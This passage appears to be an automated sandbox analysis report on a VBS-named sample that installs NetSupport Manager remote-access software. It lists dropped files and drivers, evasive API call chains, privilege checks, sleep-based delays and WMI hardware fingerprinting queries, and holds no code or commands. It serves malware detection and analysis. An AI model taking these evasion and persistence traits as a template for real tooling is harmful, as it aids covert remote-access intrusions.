                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeDropped PE file which has not been started: C:\Windows\System32\drivers\nskbfltr2.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI207D.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1ECF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI21DF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\concrt140.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2504.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\clhook4.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\IsMetro.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI215F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\supporttool.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1B79.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nssres.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspowershell.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI201E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1AFB.tmpJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeDropped PE file which has not been started: C:\Windows\System32\drivers\nskbfltr.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst64.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\libssl-1_1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI57BD.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2435.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI21BF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSToast.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\DeskDup.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI20DE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1F4F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIRES.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1F1F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIMSG.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1BC9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1FBE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2610.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIIMAGE.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc140u.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr2.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcp140.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\DBI.EXEJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI204E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\{CBB68368-7767-4CFF-B3E5-211488346702}\ARPPRODUCTICON.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClient32UI.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI25E0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1BA9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2465.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2B06.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI24C5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWVI.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2E95.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIhtmlgen.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\injlib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI213F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI4C31.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6914.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2B65.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2B95.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2485.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6963.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI51A0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\WdfCoInstaller01005.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1DF0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI291F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sysJump to dropped file
                                Source: C:\Windows\Installer\MSI3FCC.tmpDropped PE file which has not been started: C:\Windows\SysWOW64\pcimsg.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1E6F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\pciconn.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmres.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmexec.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI68D5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1DD0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1C08.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI20BE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\AudioCapture.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWXP.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI209E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI23B6.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI222E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\libcrypto-1_1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI211F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1E3F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exeJump to dropped file
                                Source: C:\Windows\Installer\MSI3FCC.tmpEvaded block: after key decision
                                Source: C:\Windows\Installer\MSI264F.tmpEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_28-55151
                                Source: C:\Windows\Installer\MSI3FCC.tmpEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                                Source: C:\Windows\Installer\MSI2BE4.tmpEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                                Source: C:\Windows\Installer\MSI2BE4.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodes
                                Source: C:\Windows\Installer\MSI3FCC.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodes
                                Source: C:\Windows\Installer\MSI264F.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_28-55824
                                Source: C:\Windows\Installer\MSI264F.tmpAPI coverage: 3.2 %
                                Source: C:\Windows\Installer\MSI2BE4.tmpAPI coverage: 3.2 %
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeAPI coverage: 6.7 %
                                Source: C:\Windows\Installer\MSI3FCC.tmpAPI coverage: 9.3 %
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe TID: 4080Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe TID: 4632Thread sleep count: 272 > 30
                                Source: C:\Windows\System32\svchost.exe TID: 1528Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeLast function: Thread delayed
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeLast function: Thread delayed
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeLast function: Thread delayed
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B280C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,28_2_00B280C0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B24AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,FindFirstFileW,FindClose,CopyFileW,28_2_00B24AF0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B10C40 FindFirstFileW,__wcsicoll,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,__wcsicoll,FindNextFileW,FindNextFileW,FindClose,28_2_00B10C40
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B255D0 _memset,FindFirstFileW,FindClose,28_2_00B255D0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B0FD80 FindFirstFileW,CompareFileTime,FindClose,__wcsicoll,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError,28_2_00B0FD80
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B0FE18 FindFirstFileW,CompareFileTime,FindClose,__wcsicoll,CreateDirectoryW,MoveFileW,28_2_00B0FE18
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B2BE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW,28_2_00B2BE60
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004980C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,30_2_004980C0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_00494AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,FindFirstFileW,FindClose,CopyFileW,30_2_00494AF0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_00480C40 FindFirstFileW,__wcsicoll,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,__wcsicoll,FindNextFileW,FindNextFileW,FindClose,30_2_00480C40
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004955D0 _memset,FindFirstFileW,FindClose,30_2_004955D0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0047FD80 FindFirstFileW,CompareFileTime,FindClose,__wcsicoll,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError,30_2_0047FD80
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0049BE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW,30_2_0049BE60
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0047FE18 FindFirstFileW,CompareFileTime,FindClose,__wcsicoll,CreateDirectoryW,MoveFileW,30_2_0047FE18
